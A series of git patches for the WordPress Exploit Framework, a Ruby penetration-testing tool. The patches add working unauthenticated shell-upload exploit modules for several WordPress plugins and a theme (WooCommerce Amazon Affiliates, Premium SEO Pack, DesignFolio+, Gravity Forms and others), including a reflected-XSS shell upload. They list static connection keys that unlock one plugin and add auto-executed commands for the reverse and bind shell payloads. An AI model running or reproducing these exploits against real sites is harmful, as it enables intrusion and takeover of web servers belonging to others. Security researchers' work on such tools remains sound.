Subject: [PATCH 36/48] Add ability to specify custom validation method

---
 lib/wpxf/wordpress/shell_upload.rb | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/lib/wpxf/wordpress/shell_upload.rb b/lib/wpxf/wordpress/shell_upload.rb
index 571b170..fcf1495 100644
--- a/lib/wpxf/wordpress/shell_upload.rb
+++ b/lib/wpxf/wordpress/shell_upload.rb
@@ -93,6 +93,11 @@ def run
     true
   end
 
+  # @return [Boolean] true if the result of the upload operation is valid.
+  def validate_upload_result
+    true
+  end
+
   # Execute the payload at the specified address.
   # @param payload_url [String] the payload URL to access.
   def execute_payload(payload_url)
@@ -123,6 +128,6 @@ def upload_payload(builder)
       return false
     end
 
-    true
+    validate_upload_result
   end
 end

From cdd6cbe3d77c3743ada93febd36b4cdcacbee898 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sun, 5 Feb 2017 14:02:08 +0000
Subject: [PATCH 37/48] Add support for auto-exec commands in bind_php and
 reverse_tcp payloads

---
 lib/wpxf/core/payload.rb  | 14 ++++++++++++++
 payloads/bind_php.rb      |  5 ++++-
 payloads/reverse_tcp.rb   |  3 +--
 payloads/socket_helper.rb | 10 ++++++++++
 4 files changed, 29 insertions(+), 3 deletions(-)

diff --git a/lib/wpxf/core/payload.rb b/lib/wpxf/core/payload.rb
index 6c8aeb5..6f40906 100644
--- a/lib/wpxf/core/payload.rb
+++ b/lib/wpxf/core/payload.rb
@@ -16,6 +16,8 @@ def initialize
           default: true
         )
       ])
+
+      self.queued_commands = []
     end
 
     # @return an encoded version of the payload.
@@ -74,12 +76,14 @@ def post_exploit(mod)
 
     # Cleanup any allocated resource to the payload.
     def cleanup
+      nil
     end
 
     # Run checks to raise warnings to the user of any issues or noteworthy
     # points in regards to the payload being used with the current module.
     # @param mod [Module] the module using the payload.
     def check(mod)
+      nil
     end
 
     # @return [Hash] a hash of constants that should be injected at the
@@ -104,9 +108,19 @@ def php_preamble
       preamble
     end
 
+    # Enqueue a command to be executed on the target system, if the
+    # payload supports queued commands.
+    # @param cmd [String] the command to execute when the payload is executed.
+    def enqueue_command(cmd)
+      queued_commands.push(cmd)
+    end
+
     # @return the payload in its raw format.
     attr_accessor :raw
 
+    # @return [Array] the commands queued to be executed on the target.
+    attr_accessor :queued_commands
+
     private
 
     def raw_payload_with_random_var_names
diff --git a/payloads/bind_php.rb b/payloads/bind_php.rb
index 1993a54..752e34e 100644
--- a/payloads/bind_php.rb
+++ b/payloads/bind_php.rb
@@ -57,7 +57,6 @@ def post_exploit(mod)
 
       Wpxf.change_stdout_sync(true) do
         mod.emit_success 'Established a session'
-        puts
         start_socket_io_loop(socket, mod)
         socket.close
         puts
@@ -84,6 +83,10 @@ def raw
       "#{DataFile.new('php', 'bind_php.php').php_content}"
     end
 
+    def cleanup
+      self.queued_commands = []
+    end
+
     attr_accessor :host
   end
 end
diff --git a/payloads/reverse_tcp.rb b/payloads/reverse_tcp.rb
index cde7c98..5fb1e6a 100644
--- a/payloads/reverse_tcp.rb
+++ b/payloads/reverse_tcp.rb
@@ -94,10 +94,8 @@ def client_connected(socket, event_emitter)
       Wpxf.change_stdout_sync(true) do
         port, ip = Socket.unpack_sockaddr_in(socket.getpeername)
         event_emitter.emit_success "Connection established from #{ip}:#{port}"
-        puts
 
         start_socket_io_loop(socket, event_emitter)
-
         socket.close
         @server.close
         puts
@@ -136,6 +134,7 @@ def post_exploit(mod)
     end
 
     def cleanup
+      self.queued_commands = []
       @network_thread.exit if @network_thread
       @server.close if @server && !@server.closed?
     end
diff --git a/payloads/socket_helper.rb b/payloads/socket_helper.rb
index 9dee308..cc78014 100644
--- a/payloads/socket_helper.rb
+++ b/payloads/socket_helper.rb
@@ -2,6 +2,7 @@
 module Wpxf::Payloads::SocketHelper
   def start_socket_io_loop(socket, event_emitter)
     read_thread = Thread.new { start_socket_read_loop(socket) }
+    execute_queued_commands(socket, event_emitter)
     start_socket_write_loop(socket, read_thread)
   rescue SignalException
     puts
@@ -11,6 +12,15 @@ def start_socket_io_loop(socket, event_emitter)
     event_emitter.emit_error "Error encountered: #{e}"
   end
 
+  def execute_queued_commands(socket, event_emitter)
+    queued_commands.each do |cmd|
+      socket.puts cmd
+      event_emitter.emit_success "Executed: #{cmd}"
+    end
+
+    puts
+  end
+
   def start_socket_write_loop(socket, read_thread)
     loop do
       input = STDIN.gets

From 1c5db7c2ed07a473373930fdd0ed203d40d33fcc Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sun, 5 Feb 2017 14:03:03 +0000
Subject: [PATCH 38/48] Add ability to emit usage info from modules on load

---
 lib/cli/modules.rb           | 1 +
 lib/wpxf/core/module_info.rb | 5 +++++
 2 files changed, 6 insertions(+)

diff --git a/lib/cli/modules.rb b/lib/cli/modules.rb
index d1bf872..83512da 100644
--- a/lib/cli/modules.rb
+++ b/lib/cli/modules.rb
@@ -27,6 +27,7 @@ def use(module_path)
         mod = context.load_module(module_path)
         mod.event_emitter.subscribe(self)
         print_good "Loaded module: #{mod}"
+        mod.emit_usage_info
         @context_stack.push(context)
       rescue StandardError => e
         print_bad "Failed to load module: #{e}"
diff --git a/lib/wpxf/core/module_info.rb b/lib/wpxf/core/module_info.rb
index 7967b9a..1e4acd2 100644
--- a/lib/wpxf/core/module_info.rb
+++ b/lib/wpxf/core/module_info.rb
@@ -50,5 +50,10 @@ def module_date
     def module_description_preformatted
       @info[:desc_preformatted]
     end
+
+    # Emits any information that the user should be aware of before using the module.
+    def emit_usage_info
+      nil
+    end
   end
 end

From 294e5ef4f66257bf0544160329840961b63cd6c3 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sun, 5 Feb 2017 14:04:06 +0000
Subject: [PATCH 39/48] Add WooCommerce Amazon Affiliates < v9 unauthenticated
 shell upload

---
 ...merce_amazon_affiliates_v8_shell_upload.rb | 78 +++++++++++++++++++
 1 file changed, 78 insertions(+)
 create mode 100644 modules/exploits/woocommerce_amazon_affiliates_v8_shell_upload.rb

diff --git a/modules/exploits/woocommerce_amazon_affiliates_v8_shell_upload.rb b/modules/exploits/woocommerce_amazon_affiliates_v8_shell_upload.rb
new file mode 100644
index 0000000..c3f2006
--- /dev/null
+++ b/modules/exploits/woocommerce_amazon_affiliates_v8_shell_upload.rb
@@ -0,0 +1,78 @@
+class Wpxf::Exploit::WoocommerceAmazonAffiliatesV8ShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'WooCommerce Amazon Affiliates < v9 Unauthenticated Shell Upload',
+      desc: %(
+        This module exploits a file upload vulnerability which allows users
+        to upload and execute PHP scripts in the context of the web server.
+
+        In order to use this module, a valid connection key must be provided.
+        These are statically defined keys, that have been changed on a number
+        of occasions.
+
+        Some of the keys that have been identified are:
+         - 1ec4614ce9b023d2a58deef6dcabb6ab
+         - c125a47cba1e8ec73945dd622d142f79
+         - 69efc4922575861f31125878597e97cf
+      ),
+      author: [
+        'Evex_1337',                      # Discovery and disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '7940']
+      ],
+      date: 'Apr 25 2015',
+      desc_preformatted: true
+    )
+
+    register_option(
+      StringOption.new(
+        name: 'connection_key',
+        desc: 'The plugin connection key, see module description for static keys',
+        required: true
+      )
+    )
+  end
+
+  def emit_usage_info
+    emit_warning 'When executing this module, the ajax.php file in woozone/modules/remote_support will be deleted. '\
+                 'In order to be able to re-use this module on the same target, be sure to re-create ajax.php if ' \
+                 'the selected payload is unable to re-create it automatically.'
+  end
+
+  def check
+    readme = normalize_uri(wordpress_url_plugins, 'woozone', 'changelog.txt')
+    check_version_from_custom_file(readme, /##\s\[(\d\.\d(\.\d)*)\]/, '9')
+  end
+
+  def uploader_url
+    normalize_uri(wordpress_url_plugins, 'woozone', 'modules', 'remote_support', 'remote_tunnel.php')
+  end
+
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_field('connection_key', datastore['connection_key'])
+    builder.add_field('action', 'save_file')
+    builder.add_field('file', 'ajax.php')
+    builder.add_field('file_content', Base64.strict_encode64(payload.encoded))
+    builder
+  end
+
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_plugins, 'woozone', 'modules', 'remote_support', 'ajax.php')
+  end
+
+  def validate_upload_result
+    upload_result.body !~ /Invalid\skey!/i
+  end
+
+  def run
+    payload.enqueue_command('echo "" > ajax.php')
+    super
+  end
+end

From 0afeaff7d275547997beff48e6f3a8df95fa9c42 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sun, 5 Feb 2017 21:13:34 +0000
Subject: [PATCH 40/48] Add newly found connection key

---
 .../exploits/woocommerce_amazon_affiliates_v8_shell_upload.rb    | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/woocommerce_amazon_affiliates_v8_shell_upload.rb b/modules/exploits/woocommerce_amazon_affiliates_v8_shell_upload.rb
index c3f2006..145d76b 100644
--- a/modules/exploits/woocommerce_amazon_affiliates_v8_shell_upload.rb
+++ b/modules/exploits/woocommerce_amazon_affiliates_v8_shell_upload.rb
@@ -18,6 +18,7 @@ def initialize
          - 1ec4614ce9b023d2a58deef6dcabb6ab
          - c125a47cba1e8ec73945dd622d142f79
          - 69efc4922575861f31125878597e97cf
+         - 501d0292aca8270d539662a5a9aad855
       ),
       author: [
         'Evex_1337',                      # Discovery and disclosure

From c2a816b11365d822ae97ae9068e4db9b681fe336 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sun, 5 Feb 2017 21:14:20 +0000
Subject: [PATCH 41/48] Add Premium SEO Pack < v1.9 unauthenticated shell
 upload

---
 .../exploits/premium_seo_pack_shell_upload.rb | 31 +++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 modules/exploits/premium_seo_pack_shell_upload.rb

diff --git a/modules/exploits/premium_seo_pack_shell_upload.rb b/modules/exploits/premium_seo_pack_shell_upload.rb
new file mode 100644
index 0000000..c9b3e9d
--- /dev/null
+++ b/modules/exploits/premium_seo_pack_shell_upload.rb
@@ -0,0 +1,31 @@
+class Wpxf::Exploit::PremiumSeoPackShellUpload < Wpxf::Exploit::WoocommerceAmazonAffiliatesV8ShellUpload
+  def initialize
+    super
+
+    update_info(
+      name: 'Premium SEO Pack < v1.9 Unauthenticated Shell Upload',
+      references: [
+        ['WPVDB', '7934']
+      ]
+    )
+  end
+
+  def emit_usage_info
+    emit_warning 'When executing this module, the ajax.php file in premium-seo-pack/modules/remote_support will be deleted. '\
+                 'In order to be able to re-use this module on the same target, be sure to re-create ajax.php if ' \
+                 'the selected payload is unable to re-create it automatically.'
+  end
+
+  def check
+    readme = normalize_uri(wordpress_url_plugins, 'premium-seo-pack', 'changelog.txt')
+    check_version_from_custom_file(readme, /##\s\[(\d\.\d(\.\d)*)\]/, '1.9')
+  end
+
+  def uploader_url
+    normalize_uri(wordpress_url_plugins, 'premium-seo-pack', 'modules', 'remote_support', 'remote_tunnel.php')
+  end
+
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_plugins, 'premium-seo-pack', 'modules', 'remote_support', 'ajax.php')
+  end
+end

From 9a65a2ca478d0ed6f7113dacf9b2883fecb6f40b Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Mon, 6 Feb 2017 00:50:39 +0000
Subject: [PATCH 42/48] Add Windows Desktop And iPhone Photo Uploader
 unauthenticated shell upload

---
 ..._and_iphone_photo_uploader_shell_upload.rb | 43 +++++++++++++++++++
 1 file changed, 43 insertions(+)
 create mode 100644 modules/exploits/windows_desktop_and_iphone_photo_uploader_shell_upload.rb

diff --git a/modules/exploits/windows_desktop_and_iphone_photo_uploader_shell_upload.rb b/modules/exploits/windows_desktop_and_iphone_photo_uploader_shell_upload.rb
new file mode 100644
index 0000000..4214649
--- /dev/null
+++ b/modules/exploits/windows_desktop_and_iphone_photo_uploader_shell_upload.rb
@@ -0,0 +1,43 @@
+class Wpxf::Exploit::WindowsDesktopAndIphonePhotoUploaderShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Windows Desktop And iPhone Photo Uploader Unauthenticated Shell Upload',
+      author: [
+        'Manish Kishan Tanwar AKA error1046', # Discovery and disclosure
+        'Rob Carr <rob[at]rastating.com>'     # WPXF module
+      ],
+      references: [
+        ['WPVDB', '7893']
+      ],
+      date: 'Apr 09 2015'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('i-dump-iphone-to-wordpress-photo-uploader')
+  end
+
+  def uploader_url
+    normalize_uri(wordpress_url_plugins, 'i-dump-iphone-to-wordpress-photo-uploader', 'uploader.php')
+  end
+
+  def payload_body_builder
+    @start_timestamp = Time.now.to_i
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string('file', payload.encoded, payload_name)
+    builder
+  end
+
+  def execute_payload(_payload_url)
+    @end_timestamp = Time.now.to_i
+    base_upload_uri = normalize_uri(wordpress_url_uploads, 'i-dump-uploads')
+
+    (@start_timestamp..@end_timestamp).each do |timestamp|
+      super(normalize_uri(base_upload_uri, "-#{timestamp}-#{payload_name}"))
+    end
+  end
+end

From d8d356282c3c8c604869ffc6854761d4f6afd812 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Mon, 6 Feb 2017 16:39:19 +0000
Subject: [PATCH 43/48] Add DesignFolio+ unauthenticated shell upload

---
 .../exploits/designfolio_plus_shell_upload.rb | 48 +++++++++++++++++++
 1 file changed, 48 insertions(+)
 create mode 100644 modules/exploits/designfolio_plus_shell_upload.rb

diff --git a/modules/exploits/designfolio_plus_shell_upload.rb b/modules/exploits/designfolio_plus_shell_upload.rb
new file mode 100644
index 0000000..17e8802
--- /dev/null
+++ b/modules/exploits/designfolio_plus_shell_upload.rb
@@ -0,0 +1,48 @@
+require 'socket'
+
+class Wpxf::Exploit::DesignfolioPlusShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'DesignFolio+ Theme Unauthenticated Shell Upload',
+      author: [
+        'CrashBandicot',                  # Vulnerability disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '7880'],
+        ['EDB', '36372']
+      ],
+      date: 'Mar 04 2015'
+    )
+  end
+
+  def check
+    check_theme_version_from_readme('designfolio-plus')
+  end
+
+  def uploader_url
+    normalize_uri(wordpress_url_themes, 'designfolio-plus', 'admin', 'upload-file.php')
+  end
+
+  def encoded_relative_path_to_uploads
+    Base64.strict_encode64('../../../uploads')
+  end
+
+  def payload_body_builder
+    target_ip = IPSocket.getaddress(target_host)
+    field_name = Utility::Text.md5(target_ip)
+
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string(field_name, payload.encoded, payload_name)
+    builder.add_field('upload_path', encoded_relative_path_to_uploads)
+    builder
+  end
+
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_uploads, payload_name.downcase)
+  end
+end

From ffe853ac8b32e5239de3eda779bed5c247dd9326 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Tue, 7 Feb 2017 00:42:52 +0000
Subject: [PATCH 44/48] Fail module execution if upload location returns nil

---
 lib/wpxf/wordpress/shell_upload.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/wpxf/wordpress/shell_upload.rb b/lib/wpxf/wordpress/shell_upload.rb
index fcf1495..e0b925c 100644
--- a/lib/wpxf/wordpress/shell_upload.rb
+++ b/lib/wpxf/wordpress/shell_upload.rb
@@ -85,6 +85,7 @@ def run
     return false unless upload_payload(builder)
 
     payload_url = uploaded_payload_location
+    return false unless payload_url
     emit_success "Uploaded the payload to #{payload_url}", true
 
     emit_info 'Executing the payload...'

From 1ecc49b76cdccbdbc724bb47de427906b124db96 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Tue, 7 Feb 2017 00:43:51 +0000
Subject: [PATCH 45/48] Add Gravity Forms <= 1.8.19 unauthenticated shell
 upload

---
 .../gravity_forms_v1.8.19_shell_upload.rb     | 90 +++++++++++++++++++
 1 file changed, 90 insertions(+)
 create mode 100644 modules/exploits/gravity_forms_v1.8.19_shell_upload.rb

diff --git a/modules/exploits/gravity_forms_v1.8.19_shell_upload.rb b/modules/exploits/gravity_forms_v1.8.19_shell_upload.rb
new file mode 100644
index 0000000..b78a938
--- /dev/null
+++ b/modules/exploits/gravity_forms_v1.8.19_shell_upload.rb
@@ -0,0 +1,90 @@
+class Wpxf::Exploit::GravityFormsV1819ShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Gravity Forms <= 1.8.19 Unauthenticated Shell Upload',
+      author: [
+        'Sucuri.net',                     # Discovery and disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '7820']
+      ],
+      date: 'Dec 08 2014'
+    )
+
+    register_option(
+      IntegerOption.new(
+        name: 'form_id',
+        desc: 'A valid Gravity Forms form ID',
+        default: 1,
+        required: true
+      )
+    )
+  end
+
+  def check
+    changelog = normalize_uri(wordpress_url_plugins, 'gravityforms', 'change_log.txt')
+    check_version_from_custom_file(changelog, /Version\s+(\d+\.\d+(\.\d+)*)/, '1.8.20')
+  end
+
+  def form_id
+    normalized_option_value('form_id')
+  end
+
+  def uploader_url
+    full_uri
+  end
+
+  def upload_request_params
+    {
+      'gf_page' => 'upload',
+      'form_id' => form_id
+    }
+  end
+
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_field('name', payload_name)
+    builder.add_field('field_id', 1)
+    builder.add_file_from_string('file', payload.encoded, "#{Utility::Text.rand_alpha(5)}.jpg")
+    builder
+  end
+
+  def scrape_upload_folder
+    emit_info 'Scraping target for the upload location...'
+    uploads_url = normalize_uri(wordpress_url_uploads, 'gravity_forms')
+    res = execute_get_request(url: uploads_url)
+
+    unless res && res.code == 200
+      emit_error 'The target appears to have directory listing disabled'
+      emit_error "Code: #{res.code}", true
+      return nil
+    end
+
+    name = res.body[/href="(#{form_id}\-[a-z0-9\/]+?)"/i, 1]
+    emit_success "Found directory: #{name}"
+    name
+  end
+
+  def validate_upload_result
+    return false unless upload_result && upload_result.code == 200
+    res = JSON.parse(upload_result.body)
+
+    if res['status'] == 'error'
+      emit_error "Upload failed: #{res['error']['message']}"
+      return false
+    end
+
+    true
+  end
+
+  def uploaded_payload_location
+    directory = scrape_upload_folder
+    return false unless directory
+    normalize_uri(wordpress_url_uploads, 'gravity_forms', directory, 'tmp', "_input_#{form_id}_#{payload_name}")
+  end
+end

From 6970fbfc4a6a853ff8e801ad11cd0d4a0c4b9e64 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Tue, 7 Feb 2017 00:52:40 +0000
Subject: [PATCH 46/48] Add Gravity Forms <= 1.9.15.11 reflected XSS shell
 upload

---
 ...s_v1.9.15.11_reflected_xss_shell_upload.rb | 33 +++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 modules/exploits/gravity_forms_v1.9.15.11_reflected_xss_shell_upload.rb

diff --git a/modules/exploits/gravity_forms_v1.9.15.11_reflected_xss_shell_upload.rb b/modules/exploits/gravity_forms_v1.9.15.11_reflected_xss_shell_upload.rb
new file mode 100644
index 0000000..c98c36f
--- /dev/null
+++ b/modules/exploits/gravity_forms_v1.9.15.11_reflected_xss_shell_upload.rb
@@ -0,0 +1,33 @@
+class Wpxf::Exploit::GravityFormsV191511ReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Gravity Forms <= 1.9.15.11 Reflected XSS Shell Upload',
+      author: [
+        'Henri Salo',                     # Discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8400'],
+        ['URL', 'http://seclists.org/bugtraq/2016/Mar/0']
+      ],
+      date: 'Mar 01 2016'
+    )
+  end
+
+  def check
+    changelog = normalize_uri(wordpress_url_plugins, 'gravityforms', 'change_log.txt')
+    check_version_from_custom_file(changelog, /Version\s+(\d+\.\d+(\.\d+)*)/, '1.8.20')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=gf_settings&subview=%22%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E%0A"
+  end
+end

From 6535f53ca9a333f499a833333ab1db27223f3376 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Tue, 7 Feb 2017 22:02:57 +0000
Subject: [PATCH 47/48] Add exit command

---
 data/json/commands.json | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/data/json/commands.json b/data/json/commands.json
index 220b34d..5a7bdcd 100644
--- a/data/json/commands.json
+++ b/data/json/commands.json
@@ -12,6 +12,10 @@
       "cmd": "clear",
       "desc": "Clear the screen."
     },
+    {
+      "cmd": "exit",
+      "desc": "Exit the WordPress Exploit Framework prompt."
+    },
     {
       "cmd": "gset [option] [value]",
       "desc": "Set the [value] of [option] globally, so it is used by the current and future modules."

From b3687d1ac5ef6be2510c01abc59f173545c18cf2 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Tue, 7 Feb 2017 22:23:57 +0000
Subject: [PATCH 48/48] Update VERSION

---
 VERSION | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/VERSION b/VERSION
index 347f583..c239c60 100644
--- a/VERSION
+++ b/VERSION
@@ -1 +1 @@
-1.4.1
+1.5